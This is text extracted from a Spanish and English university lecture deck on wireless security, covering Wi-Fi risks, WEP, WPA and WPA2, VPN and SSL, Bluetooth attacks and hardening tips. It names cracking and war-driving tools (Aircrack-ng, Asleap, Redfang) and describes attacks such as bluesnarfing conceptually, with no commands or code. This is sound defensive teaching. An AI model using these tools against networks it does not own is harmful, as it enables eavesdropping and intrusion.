Seguridad enTecnologías
Wireless
Prof. Javier Echaiz
Dpto. de Cs. e Ing. de la Computació[email protected]
http://cs.uns.edu.ar/~jechaiz
Seguridaden Wireless
Javier Echaiz 2
Roadmap
Wireless Technology1
Wireless Hacking Examples2
What to Do3
Q & A4
Seguridaden Wireless
Javier Echaiz 4
Tecnologías Wireless
With GreatPower, ComesGreatResponsibility.
Peter Parker,Spiderman
Nada esgratis. Estaflexibilidadtiene su costo.
Javier Echaiz
Seguridaden Wireless
Javier Echaiz 5
Riesgos en Wireless
• Conceptos equivocados acerca de laseguridad wireless.
• Amenazas wireless en producción,hotspots/redes rogue.
• Ataques DoS, eavesdropping,debilidades en protocolos, informationdisclosure, …
Seguridaden Wireless
Javier Echaiz 6
Riesgos (no los veremos en detalle)
Physical• Loss• Theft• Damage• Physical accessData• Data removal• Malicious code• Storage CIAAccess Control• Unauth. device• Unauth. userTransmission• Transmission CIAConnection• Unapproved AP• Unapproved network
ThreatsAdministrative• User behavior• Policy• ProceduresPhysical• Surveillance• Hostile Environment• TEMPEST• Visitor Control• Inspection• Fragile Equipment• Public PlacementTechnical• Identification• Authentication• Access Control• Protection Mechanism• Key Management• Engagement
VulnerabilitiesX AssetsNetwork• Equipment• AvailableData / Resource• Sensitivity• CriticalityDevices• Mobile Devices• Removable Storage
Classification• Conf. [H, M, L]• Integ. [H, M, L]• Avail. [H, M, L]
X
“CIA” = confidentiality, integrity, availability
Seguridaden Wireless
Javier Echaiz 7
• Red Ethernet mediante ondas deradio en lugar de cables.
• Es una herramienta para laconveniencia, idealmente cuando serequiere movilidad.
• Es una solución cuando se necesitanconexiones por cortos períodos detiempo.
Definición (1)
Seguridaden Wireless
Javier Echaiz 8
• Una tecnología que puede resolverproblemas que por distintasrazones no pueden resolversemediante tecnologías cableadas.– Lugares donde es imposible seguir agregando
cables por distintos motivos.– Áreas demasiado amplias donde los cables son
imprácticos.– Aulas.– Etc.
Definición (2)
Seguridaden Wireless
Javier Echaiz 9
What Wireless is not:
Las tecnologías wireless NO son unreemplazo de las conexionescableadas!!!!
Wireless no esni seguro, ni rápido, ni confiable.
Seguridaden Wireless
Javier Echaiz 11
• Los datos que viajan en una conexiónwireless se envían (broadcast) medianteun canal abierto de radio (tipo walkie-talkie, radio de onda corta, celular, etc.) ó
• Los datos wireless viajan “protegidos”mediante un estándar inseguro: WEP(wired equivalent protection), el cual esfácilmente crackeable y basado en“secreto compartido”. De esta forma,cualquiera con permiso de acceder a estared puede leer cualquier cosa de la red!
Wireless es inherentemente inseguro
Seguridaden Wireless
Javier Echaiz 12
Wireless is inherently insecure-There are many ways to attack:
• Pretending to besomeone/somethingelse:– SSID Attack– Malicious Association– Mac Spoofing– Man in the Middle Attack
• Direct and Denial ofService attacks:– Insertion Attack– Encryption Attack– Jamming
Seguridaden Wireless
Javier Echaiz 13
Insecure: Easily Hijacked
Malicious Association: A hacker sets up a rogue accesspoint, sets it to display a dummy login page, and collectsusernames and passwords. This is probably the mostlikely scenario to happen at Universities. Using thesecurity tools mentioned later in this presentation are agreat way to avoid falling for this trap.
Seguridaden Wireless
Javier Echaiz 14
Insecure: Easily Sniffed
“Sniffing” a connection means listening in (much like atap on a phone) and pulling useful information out of thedata stream. Most data is sent “clear text” which meansthat the sniffer can read it with little effort.
Seguridaden Wireless
Javier Echaiz 15
Security:Why the user should care
• System Administrators are often asked byusers:
• “Why should I care about security? NothingI do is confidential.”
ARE YOU SURE?
Seguridaden Wireless
Javier Echaiz 16
• Think about your password. How manysystems do you use it on? E-mail, fileserver, your on-line banking/brokering,One-click buying at Amazon.com (wherethey have your credit card # on line).Airline reservation sites or travel agents.
• If someone gets your password, theycan access any of those.
Security: Why the user should care (1)
Seguridaden Wireless
Javier Echaiz 17
• Always use different passwords ondifferent systems. That way, if onepassword gets compromised, the rest ofyour accounts will still be protected.
Security: Why the user should care (2)
Seguridaden Wireless
Javier Echaiz 18
• Is any student information (IDs, grades, etc)ever sent in e-mail? They (and other) data areconsidered confidential. There are legal issuesregarding the safety and accessibility ofinformation.
• What if someone accessed your e-mail andsent a threatening or harassing e-mail tosomeone? How could you prove it wasn’t you?Your word is often not enough.
• ‘Sniffing’ wireless traffic is trivially easywith free, easy to download, easy to usesoftware.
Security: Why the user ... (3)
Seguridaden Wireless
Javier Echaiz 21
Sniffingan SSHsession:
This is a similar session when the end-useris using encryption (SSH). The sniffer is outof luck.
Seguridaden Wireless
Javier Echaiz 24
Your hard drive is accessible.If you’re not actively using the card,
disable it or remove it.
The wireless card itself is a newavenue of attack.
Seguridaden Wireless
Javier Echaiz 25
Security solutions
It is possible to be mostly safeusing wireless technology, but theend user must be very careful.More later in this presentation.
Seguridaden Wireless
Javier Echaiz 28
Speed (1)
• Wireless is considerably slowerthan wires.
• It’s a shared resource, so the morepeople use it, the less there is foryou.
Seguridaden Wireless
Javier Echaiz 29
Speed (2)
• It doesn’t take much to have the wirelessconnection slow down to modem-likespeeds.
• Unless the user is sitting exactly next to theaccess point, the best speed they might get islow (7 to 11Megabits), and as soon as there isany interference, the speed dropsdramatically.
• If there are other users, the availablebandwidth is split between them. In addition,more users create more interference, so thespeed goes down even further.
Seguridaden Wireless
Javier Echaiz 32
Blocked by a human hand…
• This shows howthe strength of thesignal isdecreased byplacing a handover the wirelesscard.
• Green is good signal,• Red is interference,• Purple is dropped signal.
Seguridaden Wireless
Javier Echaiz 34
Interference by other technology
• This shows howmuch inter-ference isadded by using a2.4GHz cordlessphone near thewireless card.
• Green is good signal,• Red is interference,• Purple is dropped signal.
Seguridaden Wireless
Javier Echaiz 35
So, what can the user do about...
• Speed: Well, nothing, except get a bettersignal (move closer, remove obstacles).
• Reliability: Again, not much. Laws of physicsare fairly immutable, after all. Next Generationaccess points may have some other solutions:different bandwidths, more redundancy in thedata transfer, etc.
• Security: Lots! That’s what most of the rest ofthis presentation is about.
Seguridaden Wireless
Javier Echaiz 36
How the Wirewall works: (1)
• The user starts up their machine, and opens a webbrowser to go to their favorite site.
• The Wirewall sees the connection request, andredirects the user to the Wirewall Login page.
Seguridaden Wireless
Javier Echaiz 37
Wirewall specific X.500 LoginThis authentication process is encrypted.
Seguridaden Wireless
Javier Echaiz 38
• The Wirewall sends the authentication data to theX.500 (central authentication server) and checks tomake sure that the user is OK.
• The X.500 server sends back a ‘yes’ or ‘no.’• If ‘yes,’ the Wirewall server opens a connection for
that client (laptop) for a certain amount of time.• This whole process is encrypted.
How the Wirewall works: (3)
Seguridaden Wireless
Javier Echaiz 39
• After the authentication process finishes, the Wirewall redirectsthe client back out to the original website.
• From here on out, unless the client is using their own encryption,everything is insecure.
• This authentication process must be followed before the client isallowed past the wirewall onto the University network and/or theInternet (unless vpn is used, more on that later.)
How the Wirewall works: (4)
Seguridaden Wireless
Javier Echaiz 40
Using Wireless Safely
• Be Smart and Aware• Disable the Wireless card unless it is in use.• Use Encryption
– VPN (Virtual Private Network)– SSH (for TELNET, FTP, POP, IMAP, X-Win, etc.)– SSL (E-Mail, Web Browsing)
Seguridaden Wireless
Javier Echaiz 41
Using Wireless Safely:Be Smart and Aware
• Always keep in mind that the information youmay be transmitting might be confidential,important, legally protected, or potentiallydamaging.
• If it is any of those things, take steps to besafe.
• But always remember, part of the process willbe out of your control. Do you trust the entiresystem/process?
Seguridaden Wireless
Javier Echaiz 42
VPN: Advantages / Disadvantages
• Advantages:– Encrypts all of the data
from the client to the VPNserver, not just certainapplications.
– Compresses data; canspeed up connection.
– Bypasses WirewallAuthentication andauthenticates on the VPNserver.
– Easy to use once is setup.
• Disadvantages:– Does not encrypt anything
beyond the VPN server.– All encryption slows down
the connection, but this isprobably offset by thecompression.
– Has to be set up inadvance.
– Bye bye roaming.
Seguridaden Wireless
Javier Echaiz 43
Using Wireless Safely
• Use Encryption– VPN (Virtual Private Network)– SSH (Secure Shell)
• (for TELNET, FTP, POP, IMAP, X-Win, etc.)
– SSL (Secure Socket Layer)• (E-Mail, Web Browsing)
Seguridaden Wireless
Javier Echaiz 44
• SSH and SSL are both single-connection encryption methods whichshould be used whenever possible.
• SSH – (Secure Shell) tends to be usedby telnet/ftp-like applications such asSFTP/SCP and tunneling.
• SSL – (Secure Socket Layer) tends tobe used by E-mail and Webconnections.
SSH / SSL
Seguridaden Wireless
Javier Echaiz 46
SSH/SSL: Advantages &Disadvantages
• Advantages:– Encrypts data all the way
from the client to thedestination server.
– Can be used for multipledestinations.
– Easy to use once is setup.
• Disadvantages:– Only encrypts the data
using the SSH / SSLchannel.
– All encryption slows downthe connection.
– SSH: Each connectionneeds a different setup.
Seguridaden Wireless
Javier Echaiz 47
SSL Usage
• In Web Browsers:– Generally initiated by Server, and user is redirected
to a secure site, often after a login page.– Uses Certificates (Thawte, Verisign, or self-signed).– Confirm by checking Lock icon in the lower left or
right hand of web-pages.
• E-mails: SSL / PGP.
Seguridaden Wireless
Javier Echaiz 48
VPN vs. SSH/VPN
• VPN encrypts the connection from the client tothe VPN server. After that, the data is on itsown.
• SSH/SSL encrypt the data ALL the way fromthe client to the final destination.
• You CAN use both at the same time.
Seguridaden Wireless
Javier Echaiz 49
The wireless card itself is a newavenue of attack.
• Your hard drive is accessible. If you’re notactively using the card, disable it or remove it.
• If you have both your wired connection andyour wireless connection, plugged in andturned on, a hacker can use the wirelessaccess to ‘bridge’ over and access the wirednetwork.
Seguridaden Wireless
Javier Echaiz 51
Yesterday and Today
• Last Year– The NO Wireless Policy– WEP– Captive Portals
• This Year– Face it you have wireless
Policy– WPA2 + Authentication– VPN– Firewall/Policy Enforcement– Bluetooth in everything– Fake Access Points– WiMax– EvDO
• Hacking Attempts– War driving/walking/flying– Disgruntled employee– Industrial espionage– Electronic warfare
Seguridaden Wireless
Javier Echaiz 52
Whose WAP are you Connected ToAnyway?
Who are you connected to?
Seguridaden Wireless
Javier Echaiz 53
Para todolo demás
existe MC!
War Driving
• Equipment– Laptop --- u$s 1300– Wireless card --- u$s 60– Antenna --- u$s 10 (homebrew)– Scanning Software --- Free– GPS (optional)
Seguridaden Wireless
Javier Echaiz 54
Equipment
• Antennas– Omni-directional
• Mast mount– Semi-directional
• Yagi– Highly-Directional
• Grid• Parabolic
• Home Brew Antennas
Seguridaden Wireless
Javier Echaiz 55
Equipment
• Laptops– *BSD– GNU / Linux– M$ Windows– Mac OS X– Etc.
• Handhelds– HP iPaq– Sharp Zaurus– Etc.
Seguridaden Wireless
Javier Echaiz 56
Interception Range
Basic Service Set (BSS) –Single cell
Station outsidebuilding perimeter.
Seguridaden Wireless
Javier Echaiz 58
Equipment
• Scanning Software• Net Stumbler
– www.netstumber.com• Airopeek
– www.wildpackets.com• Wellenreiter
– www.remote-exploit.org• KISMET
– www.kismetwireless.net• AirSnort
– airsnort.shmoo.org
The Air in my kitchen…
Seguridaden Wireless
Javier Echaiz 60
• Wireless standard forpersonal areanetworks (PANs)
– Replace wiredconnections
– A few devices thata person carries
– A few devices on auser’s desktop
Bluetooth Security
Seguridaden Wireless
Javier Echaiz 61
Bluetooth: Where?
• Cars• Phones• PDAs• Laptops• Printers• Earpieces• Keyboard, mice• Coke Machines
Seguridaden Wireless
Javier Echaiz 63
Blue Sniffing and…
• Smurf• MeetingPoint• BTScanner• BlueSweep• BlueWatch (not free)
• Blue Jack
Seguridaden Wireless
Javier Echaiz 64
The Blue Attack
• Hooking up?
• Open Microphone
• Dialing for dollars
• Contacts, Notes, Email
Seguridaden Wireless
Javier Echaiz 67
IrDA
• Laptop• Phone• Blackberry• PDA• Keyboards/Mice• Is yours enabled?• Easy transfer• Banana sticker
Seguridaden Wireless
Javier Echaiz 68
EvDO
• Evolution Data Only, Evolution DataOptimized
• High speed• Always on• 2.4 mbps bandwidth• Supported by some cell phones• PCMCIA cards
Seguridaden Wireless
Javier Echaiz 69
Recommended References• NIST 800-48• Wireless Security Implementation Guide, Defense Information Systems Agency• Wireless Security Checklist, Defense Information Systems Agency• Open-Source Security Testing Methodology Manual, Institute for Security and Open
Methodologies• Wi-Foo The Secrets of Wireless Hacking• Real 802.11 Security Wi-Fi Protected Access and 802.11i• Wireless Security: Ensuring Compliance with HIPAA, GLBA, SOX, DoD 8100.2 and
Enterprise Policy, AirDefense, www.airdefense.com• Weaknesses in the Temporal Key Hash of WPA, Vebjorn Moen, Havard Raddum, Kjell Hole,
University of Bergen, Norway• Security Flaws in 802.11 Data Link Protocols, Nancy Cam-Winget, Russ Housley, David
Wagner, Jesse Walker• Securing a Wireless Network, Jon Allen, Jeff Wilson• Securing Wireless Data: System Architecture Challenges, Ravi, Raghunathan, Potlapally,
Computer and Communications Research Labs NEC USA• Solving the Puzzling Layers of 802.11 Security, Mischel Kwon• 802.11 Security, Praphul Chandra• NIST Wireless Network Security 802.11, Bluetooth and Handheld Devices, Tom Karygiannis,
Les Owens• Cisco SAFE: Wireless LAN Security in Depth
Seguridaden Wireless
Javier Echaiz 71
Wired Equivalent Privacy (WEP)
• Basic encryption mechanism for wirelessnetworks
• Uses RC4 for encryption• Designed to prevent casual traffic sniffing
attacks• There are a number of failures associated
with WEP and a variety of attacks to defeat it
Seguridaden Wireless
Javier Echaiz 72
WEP Attacks
• Vendor Implementation Weakness– Neesus Datacom Key Generation Algorithm– wep_crack (effective for 40-bit only)
• Dictionary Attacks– WEPAttack
• FMS Attacks– Aircrack(ng)
Seguridaden Wireless
Javier Echaiz 77
802.1x/EAP Overview
• Weaknesses and Administrative Problemsof Wireless Networks– How do you distribute dynamic keys?– How do you authenticate users?
• Solution: A LEAP of Faith!
Seguridaden Wireless
Javier Echaiz 80
Wi-Fi Protected Access (WPA)
• WPA is a part of the 802.11i specification, which isdedicated to improving the security of wirelessnetworks
• Two Major Problems with upgrading the security ofwireless networks– Had to be fixed as a software upgrade– Lack of available processing capacity in wireless
equipment
• Temporary Solution: Temporal Key IntegrityProtocol (TKIP)
Slide 81
MB9 Consider how much time you have and focus on the "must know" information that matters most to the customer. This maximizes theamount of time left for discussion and questions.
Follow the rule of 3: Organize your content around no more than 3 ideas, with no more than 3 supporting ideas for each. This createsa strong presentation focus and maximizes customer understanding and retention.Manal Bari, 02/03/2007
Seguridaden Wireless
Javier Echaiz 82
References
• Wireshark – http://www.wireshark.org• Kismet – http://www.kismetwireless.net• wep_crack – http://www.lava.net/~newsham/wlan/• WEPAttack – http://wepattack.sourceforge.net• Aircrack-ng – http://www.aircrack-ng.org• Asleap – http://asleap.sourceforge.net• Cowpatty – http://sourceforge.net/projects/cowpatty• File2air- http://secwatch.org/wifidownload.php?cat=5• http://wirelessdefence.org
Seguridaden Wireless
Javier Echaiz 83
Top 10 para seguridad Wireless
1. Cambie el password default del AP (y el username).2. Use el mejor std soportado (WAP2, WEP256, etc.).3. Cambie SSID default del AP.4. Habilite filtrado por MAC (recuerde que no es la panacea!).5. Deshabilite el broadcast del SSID.6. No se conecte automáticamente a redes Wi-Fi Open.7. Asigne IPs estáticos / Deshabilite DHCP.8. Habilite FW tanto en router (/AP) como en cada dispositivo.9. Ubique router/AP en un buen lugar (señales que se
escapan!).10.Apague la red cuando no se vaya usar por tiempos largos.
Fundamental: Educación!
Seguridaden Wireless
Javier Echaiz 87
Wireless Definition (Expansion)
CorporateAccess Point
CorporateLaptop Data
Phone
1.0 Gb
RogueAccess Point
UncontrolledAccess Point
Wireless CapableDevices
USB Drive
iPod
Non-CorpLaptop
Theft / Usurpation
Access
Mobile DataStorage
Data RemovalMalicious Code
• Interception• Interference• Damage
Seguridaden Wireless
Javier Echaiz 88
Securing Wireless at Work
• The Security Policy• Authentication• Authorization• VPN• DMZ• Wireless on their own VLAN• Hardened wireless gateway• Device policy enforcement• Passwords on devices• Auto erase on devices when password authentication fails a set number of times• Disable, remove, scratch IrDA ports not needed• Physical examination of site regularly• Wireless Audits• IDS
Seguridaden Wireless
Javier Echaiz 89
Secure 802.11 at Home
• WEP– RC4– 64 bit– 128 bit more secure (bit slower speed)– Pass phrase
• WPA– Pre-shared keys
• TKIP– Temporal Key Integrity Protocol. TKIP utilizes a stronger encryption method and
incorporates Message Integrity Code (MIC) to provide additional protection. Still RC4.• AES
– Advanced Encryption System, which utilizes a symmetric 128-Bit block data encryption.
– Pre-shared keys with Radius• RADIUS uses an external RADIUS server to perform user authentication.
Seguridaden Wireless
Javier Echaiz 90
More Home Security
• Mac Filtering• SSID• VPN• Best Practices… what not to do on your wireless segment• DMZ• Firewalls
Seguridaden Wireless
Javier Echaiz 91
Robust Security Network Association
RADIUSserver
Supplicant(wireless device)
Authenticator(access point)
associated associated
802.11 association
EAP/802.1X/RADIUS authenticationMSK
MSKMSK(master session key)
PMK
4-way handshake
PTK (pairwise transient key) PTKGTK (group temporal key) GTK
Group key handshake
New GTK New GTK
Data
For broadcast andmulticast traffic
PMK (pairwise master key)
Seguridaden Wireless
Javier Echaiz 92
WEP vs. WPA vs. WPA2
WEP WPA WPA2Encryption RC4 RC4 AES
Key rotation None Dynamicsession keys
Dynamicsession keys
Key distribution Manuallytyped intoeach device
Automaticdistributionavailable
Automaticdistributionavailable
Authentication Uses WEPkey asAuthC
Can use 802.1x& EAP
Can use 802.1x& EAP
Seguridaden Wireless
Javier Echaiz 95
Non-discoverable Phones
• Most bluetooth devices allow you tomake them non-discoverable.
• Do not broadcast.• Still able brute-force MAC address toconnect.
• Redfang tool does this for you.
Seguridaden Wireless
Javier Echaiz 96
Bluetooth Attacks
• Bluesnarfing– Vulnerabilities in OBEX protocol allows unauthenticated access to
bluetooth services. Allows exploits such as dumping all contacts.• Backdooring
– Once a device is paired, even if that device is removed, access isstill allowed.
• Bluebugging– Creating unauthenticated serial-over-bluetooth connection. Allows
full access to phone and supposedly allows attacks such as turningphone into listening device.
• Bluejacking– Tricking user into setting up a connection through the widespread
use of bluejacking.